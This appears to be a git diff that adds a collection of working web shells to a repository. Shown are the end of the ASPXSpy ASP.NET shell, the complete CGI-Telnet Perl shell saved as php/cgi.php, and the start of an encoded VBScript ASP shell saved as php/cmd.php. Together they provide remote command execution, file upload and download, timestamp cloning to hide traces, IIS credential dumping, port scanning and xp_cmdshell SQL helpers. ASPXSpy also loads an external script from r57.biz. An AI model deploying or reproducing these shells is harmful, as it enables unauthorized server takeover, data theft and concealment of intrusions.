+tr.Cells.Add(tc); +tc=new TableCell(); +tc.Text=mTG(objfile.Length); +tr.Cells.Add(tc); +oJiym.Rows.Add(tr); +} +public void xseuB(string instr) +{ +jDKt.Visible=true; +jDKt.InnerText=instr; +} +protected void xVm(object sender,EventArgs e) +{ +string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower(); +if(Jfm==Password) +{ +Response.Cookies.Add(new HttpCookie(vbhLn,Password)); +ljtzC.Visible=false; +PBZw(); +} +else +{ +tZSx(); +} +} +protected void Ybg(object sender,EventArgs e) +{ +krIR(Server.MapPath(".")); +} +protected void KjPi(object sender,EventArgs e) +{ +Bin_H2_Title.InnerText="IIS Spy >>"; +WICxe(); +VNR.Visible=true; +AdCx(); +} +protected void DGCoW(object sender,EventArgs e) +{ +try +{ +StreamWriter sw; +if(NdCX.SelectedItem.Text=="UTF-8") +{ +sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8); +} +else +{ +sw=new StreamWriter(Sqon.Value,false,Encoding.Default); +} +sw.Write(Xgvv.InnerText); +sw.Close(); +xseuB("Save file success !"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void lbjLD(object sender,EventArgs e) +{ +string FlwA=AXSbb.Value; +FlwA=OElM(FlwA); +try +{ +Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value)); +xseuB("File upload success!"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void EXV(object sender,EventArgs e) +{ +krIR(AXSbb.Value); +} +protected void mcCY(object sender,EventArgs e) +{ +krIR(Server.MapPath(".")); +} +protected void iVk(object sender,CommandEventArgs e) +{ +krIR(e.CommandArgument.ToString()); +} +protected void XXrLw(object sender,EventArgs e) +{ +try +{ +File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value)); +File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value)); +File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value)); +xseuB("File time clone success!"); +} +catch(Exception error) +{ +xseuB(error.Message); +} 
+krIR(AXSbb.Value); +} +protected void tIykC(object sender,EventArgs e) +{ +string path=pWVL.Value; +try +{ +File.SetAttributes(path,FileAttributes.Normal); +if(ZhWSK.Checked) +{ +File.SetAttributes(path,FileAttributes.ReadOnly); +} +if(SsR.Checked) +{ +File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System); +} +if(ccB.Checked) +{ +File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden); +} +if(fbyZ.Checked) +{ +File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive); +} +File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value)); +File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value)); +File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value)); +xseuB("File attributes modify success!"); +} +catch(Exception error) +{ +xseuB(error.Message); +} +krIR(AXSbb.Value); +} +protected void VOxn(object sender,EventArgs e) +{ +WICxe(); +vIac.Visible=true; +Bin_H2_Title.InnerText="Execute Command >>"; +} +protected void FbhN(object sender,EventArgs e) +{ +try +{ +Process ahAE=new Process(); +ahAE.StartInfo.FileName=kusi.Value; +ahAE.StartInfo.Arguments=bkcm.Value; +ahAE.StartInfo.UseShellExecute=false; +ahAE.StartInfo.RedirectStandardInput=true; +ahAE.StartInfo.RedirectStandardOutput=true; +ahAE.StartInfo.RedirectStandardError=true; +ahAE.Start(); +string Uoc=ahAE.StandardOutput.ReadToEnd(); +Uoc=Uoc.Replace("<","<"); +Uoc=Uoc.Replace(">",">"); +Uoc=Uoc.Replace("\r\n","<br>"); +tnQRF.Visible=true; +tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>"; +} +catch(Exception error) +{ +xseuB(error.Message); +} +} +protected void RAFL(object sender,EventArgs e) +{ +if(qPdI.Text.Length>0) +{ +tpRQ(qPdI.Text); +} +else +{ +lFAvw(); +} +} +protected void Grxk(object sender,EventArgs e) +{ +YUw(); +} +protected void ilC(object sender,EventArgs e) +{ +tZRH(); +} +protected void HtB(object sender,EventArgs e) +{ +pDVM(); +} +protected void Olm(object sender,EventArgs e) +{ +iLVUT(); +} +protected void 
jXhS(object sender,EventArgs e) +{ +ADCpk(); +} +protected void lRfRj(object sender,EventArgs e) +{ +lDODR(); +} +protected void xSy(object sender,EventArgs e) +{ +xFhz(); +} +protected void dMx(object sender,EventArgs e) +{ +rAhe(); +} +protected void zOVO(object sender,EventArgs e) +{ +if(((DropDownList)sender).ID.ToString()=="WYmo") +{ +dQIIF.Visible=false; +MasR.Text=WYmo.SelectedItem.Value.ToString(); +} +if(((DropDownList)sender).ID.ToString()=="Pvf") +{ +xTZY(); +} +if(((DropDownList)sender).ID.ToString()=="FGEy") +{ +jHIy.InnerText=FGEy.SelectedItem.Value.ToString(); +} +if(((DropDownList)sender).ID.ToString()=="NdCX") +{ +gLKc(Sqon.Value); +} +} +protected void IkkO(object sender,EventArgs e) +{ +krIR(AXSbb.Value); +} +protected void BGY(object sender,EventArgs e) +{ +vCf(); +} +protected void cptS(object sender,EventArgs e) +{ +vNCHZ(); +} +protected void fDO(object sender,EventArgs e) +{ +MHLv(); +} +protected void vJNsE(object sender,EventArgs e) +{ +vuou(); +xseuB("Clear All Thread ......"); +} +protected void wDZ(object sender,EventArgs e) +{ +if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return; +ruQO(); +xseuB("All Thread Start ......"); +} +protected void tYoZ(object sender,EventArgs e) +{ +} +protected void ELkQ(object sender,EventArgs e) +{ +VikG(); +GBYT.Visible=true; +string res=string.Empty; +foreach(ScanPort th in IVc) +{ +res+=th.ip+" : "+th.port+" ................................. 
"+th.status+"<br>"; +} +GBYT.InnerHtml=res; +} +protected void ORUgV(object sender,EventArgs e) +{ +dwgT(); +} +public void WICxe() +{ +DCbS.Visible=false; +CzfO.Visible=false; +APl.Visible=false; +vIac.Visible=false; +kkHN.Visible=false; +YwLB.Visible=false; +iDgmL.Visible=false; +hOWTm.Visible=false; +vrFA.Visible=false; +yhv.Visible=false; +} +</script> +<html xmlns="http://www.w3.org/1999/xhtml" > +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +<head id="Head1" runat="server"> +<SCRIPT SRC=http://r57.biz/yazciz/ciz.js></SCRIPT> +<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/> +<title>ASPXspy + + + + + +
+
+Password: + +

+Copyright © 2009 Bin -- www.rootkit.net.cn +

+
+
+ + + + + + + +
ASPXSpy Ver: 2009
+ | | | | | | | | | | | | | +
+
+
+
+

+<%--FileList--%> +
+ + + + + + +
Current Directory : +
+ + + + FilenameLast modifiedSizeAction + +
+
+
| Create Directory | Create File + | Kill Me +
+
+<%--FileEdit--%> +
+

Current File(import new file name and new file)
+ DefaultUTF-8 +

+

File Content
+ +

+

+
+<%--CloneTime--%> +
+

Alter file

+

Reference file(fullpath)

+

+

Set last modified »

+

Current file(fullpath)

+

+ +  + +  + +  + +

+

+CreationTime : + +LastWriteTime : + +LastAccessTime : + +

+

+ +

+
+<%--IISSpy--%> +
+ + +IDIIS_USERIIS_PASSDomainPath + +
+
+<%--Process--%> +
+ + +IDProcessThreadCountPriorityAction + +
+
+<%--CmdShell--%> +
+

CmdPath:
+ +

+ Argument:
+ +
+
+
+<%--Services--%> +
+ + +IDNamePathStateStartMode + +
+
+<%--Sysinfo--%> +
+
+
    +

    +
    +
      +

      +
      +
        +
        +<%--UserInfo--%> +
        + + + +
        +
        +<%--SuExp--%> +
        + + + + + + + + + + + + +
        UserName : PassWord : Port :
        CmdShell  : 
        +
        + + + + + + +
        +
        +
        +<%--Reg--%> +
        +

        Registry Path :

        + + + +KeyValue + +
        +
        +<%--PortScan--%> +
        +

        +IP : Port : +

        +
        +
        +<%--DataBase--%> +
        +

        ConnString : MSSQLACCESS

        +
        +
        +
        +Please select a database : +SQLExec : -- SQL Server Exec --Add xp_cmdshellAdd sp_oacreateAdd xp_cmdshell(SQL2005)Add sp_oacreate(SQL2005)Add makewebtask(SQL2005)Add openrowset/opendatasource(SQL2005)XP_cmdshell execXP_dirtreeSP_oamethod execSP_makewebtask make fileSandBoxLogBackupDatabaseBackup +
        +
        Run SQL
        +
        +
        +

        + +

        +
        +
        +
        +<%--PortMap--%> +
        + + + + + + + +
        Local Ip : Local Port : Remote Ip : Remote Port :

        +<%--Search--%> +
        + + + + + + + + + + + + + + + + + + + + + +
        Keyword Use Regex
        Replace As Replace
        Search FileTypeFile NameFile Content
        Path
        +
        +
        + +File PathLast modifiedSize + +
        +
        +
        Copyright © 2006-2009 Shell sql tool All Rights Reserved.
        +
+
+
\ No newline at end of file
diff --git a/php/cgi.php b/php/cgi.php
new file mode 100644
index 0000000..c3a2645
--- /dev/null
+++ b/php/cgi.php
@@ -0,0 +1,690 @@
+#!/usr/bin/perl
+#------------------------------------------------------------------------------
+# Copyright and Licence
+#------------------------------------------------------------------------------
+# CGI-Telnet Version 1.0 for NT and Unix : Run Commands on your Web Server
+#
+# Copyright (C) 2001 Rohitab Batra
+# Permission is granted to use, distribute and modify this script so long
+# as this copyright notice is left intact. If you make changes to the script
+# please document them and inform me. If you would like any changes to be made
+# in this script, you can e-mail me.
+#
+# Author: Rohitab Batra
+# Author e-mail: rohitab@rohitab.com
+# Author Homepage: http://www.rohitab.com/
+# Script Homepage: http://www.rohitab.com/cgiscripts/cgitelnet.html
+# Product Support: http://www.rohitab.com/support/
+# Discussion Forum: http://www.rohitab.com/discuss/
+# Mailing List: http://www.rohitab.com/mlist/
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Installation
+#------------------------------------------------------------------------------
+# To install this script
+#
+# 1. Modify the first line "#!/usr/bin/perl" to point to the correct path on
+# your server. For most servers, you may not need to modify this.
+# 2. Change the password in the Configuration section below.
+# 3. If you're running the script under Windows NT, set $WinNT = 1 in the
+# Configuration Section below.
+# 4. Upload the script to a directory on your server which has permissions to
+# execute CGI scripts. This is usually cgi-bin. Make sure that you upload
+# the script in ASCII mode.
+# 5. Change the permission (CHMOD) of the script to 755.
+# 6. Open the script in your web browser. If you uploaded the script in
+# cgi-bin, this should be http://www.yourserver.com/cgi-bin/cgitelnet.pl
+# 7. Login using the password that you specified in Step 2.
+#------------------------------------------------------------------------------
+
+#------------------------------------------------------------------------------
+# Configuration: You need to change only $Password and $WinNT. The other
+# values should work fine for most systems.
+#------------------------------------------------------------------------------
+$Password = "skyclad1"; # Change this. You will need to enter this
+ # to login.
+
+$WinNT = 0; # You need to change the value of this to 1 if
+ # you're running this script on a Windows NT
+ # machine. If you're running it on Unix, you
+ # can leave the value as it is.
+
+$NTCmdSep = "&"; # This character is used to seperate 2 commands
+ # in a command line on Windows NT.
+
+$UnixCmdSep = ";"; # This character is used to seperate 2 commands
+ # in a command line on Unix.
+
+$CommandTimeoutDuration = 10; # Time in seconds after commands will be killed
+ # Don't set this to a very large value. This is
+ # useful for commands that may hang or that
+ # take very long to execute, like "find /".
+ # This is valid only on Unix servers. It is
+ # ignored on NT Servers.
+
+$ShowDynamicOutput = 1; # If this is 1, then data is sent to the
+ # browser as soon as it is output, otherwise
+ # it is buffered and send when the command
+ # completes. This is useful for commands like
+ # ping, so that you can see the output as it
+ # is being generated.
+
+# DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
+
+$CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
+$CmdPwd = ($WinNT ? "cd" : "pwd");
+$PathSep = ($WinNT ? "\\" : "/");
+$Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
+
+#------------------------------------------------------------------------------
+# Reads the input sent by the browser and parses the input variables. It
+# parses GET, POST and multipart/form-data that is used for uploading files.
+# The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
+# Other variables can be accessed using $in{'var'}, where var is the name of +# the variable. Note: Most of the code in this function is taken from other CGI +# scripts. +#------------------------------------------------------------------------------ +sub ReadParse +{ + local (*in) = @_ if @_; + local ($i, $loc, $key, $val); + + $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/; + + if($ENV{'REQUEST_METHOD'} eq "GET") + { + $in = $ENV{'QUERY_STRING'}; + } + elsif($ENV{'REQUEST_METHOD'} eq "POST") + { + binmode(STDIN) if $MultipartFormData & $WinNT; + read(STDIN, $in, $ENV{'CONTENT_LENGTH'}); + } + + # handle file upload data + if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/) + { + $Boundary = '--'.$1; # please refer to RFC1867 + @list = split(/$Boundary/, $in); + $HeaderBody = $list[1]; + $HeaderBody =~ /\r\n\r\n|\n\n/; + $Header = $`; + $Body = $'; + $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape + $in{'filedata'} = $Body; + $Header =~ /filename=\"(.+)\"/; + $in{'f'} = $1; + $in{'f'} =~ s/\"//g; + $in{'f'} =~ s/\s//g; + + # parse trailer + for($i=2; $list[$i]; $i++) + { + $list[$i] =~ s/^.+name=$//; + $list[$i] =~ /\"(\w+)\"/; + $key = $1; + $val = $'; + $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g; + $val =~ s/%(..)/pack("c", hex($1))/ge; + $in{$key} = $val; + } + } + else # standard post data (url encoded, not multipart) + { + @in = split(/&/, $in); + foreach $i (0 .. 
$#in) + { + $in[$i] =~ s/\+/ /g; + ($key, $val) = split(/=/, $in[$i], 2); + $key =~ s/%(..)/pack("c", hex($1))/ge; + $val =~ s/%(..)/pack("c", hex($1))/ge; + $in{$key} .= "\0" if (defined($in{$key})); + $in{$key} .= $val; + } + } +} + +#------------------------------------------------------------------------------ +# Prints the HTML Page Header +# Argument 1: Form item name to which focus should be set +#------------------------------------------------------------------------------ +sub PrintPageHeader +{ + $EncodedCurrentDir = $CurrentDir; + $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; + print "Content-type: text/html\n\n"; + print < + +CGI-Telnet Version 1.0 +$HtmlMetaHeader + + + + + + + + + + +
        +#CGI-Telnet Version 1.0 - Connected to $ServerName
        +Upload File | +Download File | +Disconnect | +Help +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the Login Screen +#------------------------------------------------------------------------------ +sub PrintLoginScreen +{ + $Message = q$
         _____  _____  _____          _____        _               _
        +/  __ \|  __ \|_   _|        |_   _|      | |             | |
        +| /  \/| |  \/  | |   ______   | |    ___ | | _ __    ___ | |_
        +| |    | | __   | |  |______|  | |   / _ \| || '_ \  / _ \| __|
        +| \__/\| |_\ \ _| |_           | |  |  __/| || | | ||  __/| |_
        + \____/ \____/ \___/           \_/   \___||_||_| |_| \___| \__| 1.0
        +                                         
        +                      ______             © 2001, Rohitab Batra
        +                   .-"      "-.
        +                  /            \
        +                 |              |
        +                 |,  .-.  .-.  ,|
        +                 | )(_o/  \o_)( |
        +                 |/     /\     \|
        +       (@_       (_     ^^     _)
        +  _     ) \_______\__|IIIIII|__/_______________________
        + (_)@8@8{}<________|-\IIIIII/-|________________________>
        +        )_/        \          / 
        +       (@           `--------`
        +             W A R N I N G: Private Server
        +$; +#' + print < +Trying $ServerName...
        +Connected to $ServerName
        +Escape character is ^] +$Message +END +} + +#------------------------------------------------------------------------------ +# Prints the message that informs the user of a failed login +#------------------------------------------------------------------------------ +sub PrintLoginFailedMessage +{ + print < +
        login: admin
        +password:
        +Login incorrect

        +
        +END +} + +#------------------------------------------------------------------------------ +# Prints the HTML form for logging in +#------------------------------------------------------------------------------ +sub PrintLoginForm +{ + print < +
        + +login: admin
        +password: + +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the footer for the HTML Page +#------------------------------------------------------------------------------ +sub PrintPageFooter +{ + print "
        "; +} + +#------------------------------------------------------------------------------ +# Retreives the values of all cookies. The cookies can be accesses using the +# variable $Cookies{''} +#------------------------------------------------------------------------------ +sub GetCookies +{ + @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'}); + foreach $cookie(@httpcookies) + { + ($id, $val) = split(/=/, $cookie); + $Cookies{$id} = $val; + } +} + +#------------------------------------------------------------------------------ +# Prints the screen when the user logs out +#------------------------------------------------------------------------------ +sub PrintLogoutScreen +{ + print "Connection closed by foreign host.

        "; +} + +#------------------------------------------------------------------------------ +# Logs out the user and allows the user to login again +#------------------------------------------------------------------------------ +sub PerformLogout +{ + print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie + &PrintPageHeader("p"); + &PrintLogoutScreen; + &PrintLoginScreen; + &PrintLoginForm; + &PrintPageFooter; +} + +#------------------------------------------------------------------------------ +# This function is called to login the user. If the password matches, it +# displays a page that allows the user to run commands. If the password doens't +# match or if no password is entered, it displays a form that allows the user +# to login +#------------------------------------------------------------------------------ +sub PerformLogin +{ + if($LoginPassword eq $Password) # password matched + { + print "Set-Cookie: SAVEDPWD=$LoginPassword;\n"; + &PrintPageHeader("c"); + &PrintCommandLineInputForm; + &PrintPageFooter; + } + else # password didn't match + { + &PrintPageHeader("p"); + &PrintLoginScreen; + if($LoginPassword ne "") # some password was entered + { + &PrintLoginFailedMessage; + } + &PrintLoginForm; + &PrintPageFooter; + } +} + +#------------------------------------------------------------------------------ +# Prints the HTML form that allows the user to enter commands +#------------------------------------------------------------------------------ +sub PrintCommandLineInputForm +{ + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print < +
        + + +$Prompt + + +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the HTML form that allows the user to download files +#------------------------------------------------------------------------------ +sub PrintFileDownloadForm +{ + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print < +
        + + +$Prompt download

        +Filename:

        +Download: +
        + +END +} + +#------------------------------------------------------------------------------ +# Prints the HTML form that allows the user to upload files +#------------------------------------------------------------------------------ +sub PrintFileUploadForm +{ + $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print < +
        +$Prompt upload

        +Filename:

        +Options:   +Overwrite if it Exists

        +Upload:    + + +
        + +END +} + +#------------------------------------------------------------------------------ +# This function is called when the timeout for a command expires. We need to +# terminate the script immediately. This function is valid only on Unix. It is +# never called when the script is running on NT. +#------------------------------------------------------------------------------ +sub CommandTimeout +{ + if(!$WinNT) + { + alarm(0); + print < + +Command exceeded maximum time of $CommandTimeoutDuration second(s). +
        Killed it! + +END + &PrintCommandLineInputForm; + &PrintPageFooter; + exit; + } +} + +#------------------------------------------------------------------------------ +# This function is called to execute commands. It displays the output of the +# command and allows the user to enter another command. The change directory +# command is handled differently. In this case, the new directory is stored in +# an internal variable and is used each time a command has to be executed. The +# output of the change directory command is not displayed to the users +# therefore error messages cannot be displayed. +#------------------------------------------------------------------------------ +sub ExecuteCommand +{ + if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command + { + # we change the directory internally. The output of the + # command is not displayed. + + $OldDir = $CurrentDir; + $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd; + chop($CurrentDir = `$Command`); + &PrintPageHeader("c"); + $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\$ "; + print "$Prompt $RunCommand"; + } + else # some other command, display the output + { + &PrintPageHeader("c"); + $Prompt = $WinNT ? 
"$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\$ "; + print "$Prompt $RunCommand"; + $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector; + if(!$WinNT) + { + $SIG{'ALRM'} = \&CommandTimeout; + alarm($CommandTimeoutDuration); + } + if($ShowDynamicOutput) # show output as it is generated + { + $|=1; + $Command .= " |"; + open(CommandOutput, $Command); + while(<CommandOutput>) + { + $_ =~ s/(\n|\r\n)$//; + print "$_\n"; + } + $|=0; + } + else # show output after command completes + { + print `$Command`; + } + if(!$WinNT) + { + alarm(0); + } + print ""; + } + &PrintCommandLineInputForm; + &PrintPageFooter; +} + +#------------------------------------------------------------------------------ +# This function displays the page that contains a link which allows the user +# to download the specified file. The page also contains a auto-refresh +# feature that starts the download automatically. +# Argument 1: Fully qualified filename of the file to be downloaded +#------------------------------------------------------------------------------ +sub PrintDownloadLinkPage +{ + local($FileUrl) = @_; + if(-e $FileUrl) # if the file exists + { + # encode the file link so we can send it to the browser + $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg; + $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go"; + $HtmlMetaHeader = ""; + &PrintPageHeader("c"); + print < +Sending File $TransferFile...
        +If the download does not start automatically, +Click Here. +
        +END + &PrintCommandLineInputForm; + &PrintPageFooter; + } + else # file doesn't exist + { + &PrintPageHeader("f"); + print "Failed to download $FileUrl: $!"; + &PrintFileDownloadForm; + &PrintPageFooter; + } +} + +#------------------------------------------------------------------------------ +# This function reads the specified file from the disk and sends it to the +# browser, so that it can be downloaded by the user. +# Argument 1: Fully qualified pathname of the file to be sent. +#------------------------------------------------------------------------------ +sub SendFileToBrowser +{ + local($SendFile) = @_; + if(open(SENDFILE, $SendFile)) # file opened for reading + { + if($WinNT) + { + binmode(SENDFILE); + binmode(STDOUT); + } + $FileSize = (stat($SendFile))[7]; + ($Filename = $SendFile) =~ m!([^/^\\]*)$!; + print "Content-Type: application/x-unknown\n"; + print "Content-Length: $FileSize\n"; + print "Content-Disposition: attachment; filename=$1\n\n"; + print while(); + close(SENDFILE); + } + else # failed to open file + { + &PrintPageHeader("f"); + print "Failed to download $SendFile: $!"; + &PrintFileDownloadForm; + &PrintPageFooter; + } +} + +#------------------------------------------------------------------------------ +# This function is called when the user downloads a file. It displays a message +# to the user and provides a link through which the file can be downloaded. +# This function is also called when the user clicks on that link. In this case, +# the file is read and sent to the browser. 
+#------------------------------------------------------------------------------ +sub BeginDownload +{ + # get fully qualified path of the file to be downloaded + if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | + (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute + { + $TargetFile = $TransferFile; + } + else # path is relative + { + chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; + $TargetFile .= $PathSep.$TransferFile; + } + + if($Options eq "go") # we have to send the file + { + &SendFileToBrowser($TargetFile); + } + else # we have to send only the link page + { + &PrintDownloadLinkPage($TargetFile); + } +} + +#------------------------------------------------------------------------------ +# This function is called when the user wants to upload a file. If the +# file is not specified, it displays a form allowing the user to specify a +# file, otherwise it starts the upload process. +#------------------------------------------------------------------------------ +sub UploadFile +{ + # if no file is specified, print the upload form again + if($TransferFile eq "") + { + &PrintPageHeader("f"); + &PrintFileUploadForm; + &PrintPageFooter; + return; + } + &PrintPageHeader("c"); + + # start the uploading process + print "Uploading $TransferFile to $CurrentDir...
        "; + + # get the fullly qualified pathname of the file to be created + chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/; + $TransferFile =~ m!([^/^\\]*)$!; + $TargetName .= $PathSep.$1; + + $TargetFileSize = length($in{'filedata'}); + # if the file exists and we are not supposed to overwrite it + if(-e $TargetName && $Options ne "overwrite") + { + print "Failed: Destination file already exists.
        "; + } + else # file is not present + { + if(open(UPLOADFILE, ">$TargetName")) + { + binmode(UPLOADFILE) if $WinNT; + print UPLOADFILE $in{'filedata'}; + close(UPLOADFILE); + print "Transfered $TargetFileSize Bytes.
        "; + print "File Path: $TargetName
        "; + } + else + { + print "Failed: $!
        "; + } + } + print "
        "; + &PrintCommandLineInputForm; + &PrintPageFooter; +} + +#------------------------------------------------------------------------------ +# This function is called when the user wants to download a file. If the +# filename is not specified, it displays a form allowing the user to specify a +# file, otherwise it displays a message to the user and provides a link +# through which the file can be downloaded. +#------------------------------------------------------------------------------ +sub DownloadFile +{ + # if no file is specified, print the download form again + if($TransferFile eq "") + { + &PrintPageHeader("f"); + &PrintFileDownloadForm; + &PrintPageFooter; + return; + } + + # get fully qualified path of the file to be downloaded + if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) | + (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute + { + $TargetFile = $TransferFile; + } + else # path is relative + { + chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/; + $TargetFile .= $PathSep.$TransferFile; + } + + if($Options eq "go") # we have to send the file + { + &SendFileToBrowser($TargetFile); + } + else # we have to send only the link page + { + &PrintDownloadLinkPage($TargetFile); + } +} + +#------------------------------------------------------------------------------ +# Main Program - Execution Starts Here +#------------------------------------------------------------------------------ +&ReadParse; +&GetCookies; + +$ScriptLocation = $ENV{'SCRIPT_NAME'}; +$ServerName = $ENV{'SERVER_NAME'}; +$LoginPassword = $in{'p'}; +$RunCommand = $in{'c'}; +$TransferFile = $in{'f'}; +$Options = $in{'o'}; + +$Action = $in{'a'}; +$Action = "login" if($Action eq ""); # no action specified, use default + +# get the directory in which the commands will be executed +$CurrentDir = $in{'d'}; +chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq ""); + +$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password; + +if($Action eq "login" || !$LoggedIn) # user needs/has to login +{ + 
&PerformLogin;
+}
+elsif($Action eq "command") # user wants to run a command
+{
+ &ExecuteCommand;
+}
+elsif($Action eq "upload") # user wants to upload a file
+{
+ &UploadFile;
+}
+elsif($Action eq "download") # user wants to download a file
+{
+ &DownloadFile;
+}
+elsif($Action eq "logout") # user wants to logout
+{
+ &PerformLogout;
+}
\ No newline at end of file
diff --git a/php/cmd.php b/php/cmd.php
new file mode 100644
index 0000000..8aabb2a
--- /dev/null
+++ b/php/cmd.php
@@ -0,0 +1,1102 @@ +<%@ LANGUAGE = VBScript.Encode%> +<%//**Start Encode +On Error Resume Next + +Dim myFSO,showdisks +Set myFSO = CreateObject ("Scripting.FileSystemObject") +showdisks=FALSE + +Server.ScriptTimeOut = 7200 +Class FileUploader + Public Files + Private mcolFormElem + Private Sub Class_Initialize() + Set Files = Server.CreateObject("Scripting.Dictionary") + Set mcolFormElem = Server.CreateObject("Scripting.Dictionary") + End Sub + Private Sub Class_Terminate() + If IsObject(Files) Then + Files.RemoveAll() + Set Files = Nothing + End If + If IsObject(mcolFormElem) Then + mcolFormElem.RemoveAll() + Set mcolFormElem = Nothing + End If + End Sub + Public Property Get Form(sIndex) + Form = "" + If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex)) + End Property + Public Default Sub Upload() + Dim biData, sInputName + Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos + Dim nPosFile, nPosBound + biData = Request.BinaryRead(Request.TotalBytes) + nPosBegin = 1 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) + If (nPosEnd-nPosBegin) <= 0 Then Exit Sub + vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin) + nDataBoundPos = InstrB(1, biData, vDataBounds) + Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--")) + nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition")) + nPos = InstrB(nPos, biData, CByteString("name=")) + nPosBegin = nPos + 6 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) + sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename=")) + nPosBound = InstrB(nPosEnd, biData, vDataBounds) + If nPosFile <> 0 And nPosFile < nPosBound Then + Dim oUploadFile, sFileName + Set oUploadFile = New UploadedFile + nPosBegin = nPosFile + 10 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34))) + sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + 
oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\")) + nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:")) + nPosBegin = nPos + 14 + nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13))) + oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + nPosBegin = nPosEnd+4 + nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 + oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin) + If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile + Else + nPos = InstrB(nPos, biData, CByteString(Chr(13))) + nPosBegin = nPos + 4 + nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2 + If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin)) + End If + nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds) + Loop + End Sub + Private Function CByteString(sString) + Dim nIndex + For nIndex = 1 to Len(sString) + CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1))) + Next + End Function + Private Function CWideString(bsString) + Dim nIndex + CWideString ="" + For nIndex = 1 to LenB(bsString) + CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) + Next + End Function +End Class +Class UploadedFile + Public ContentType + Public FileName + Public FileData + Public Property Get FileSize() + FileSize = LenB(FileData) + End Property + Public Sub SaveToDisk(sPath) + Dim oFS, oFile + Dim nIndex + If sPath = "" Or FileName = "" Then Exit Sub + If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\" + Set oFS = Server.CreateObject("Scripting.FileSystemObject") + If Not oFS.FolderExists(sPath) Then Exit Sub + 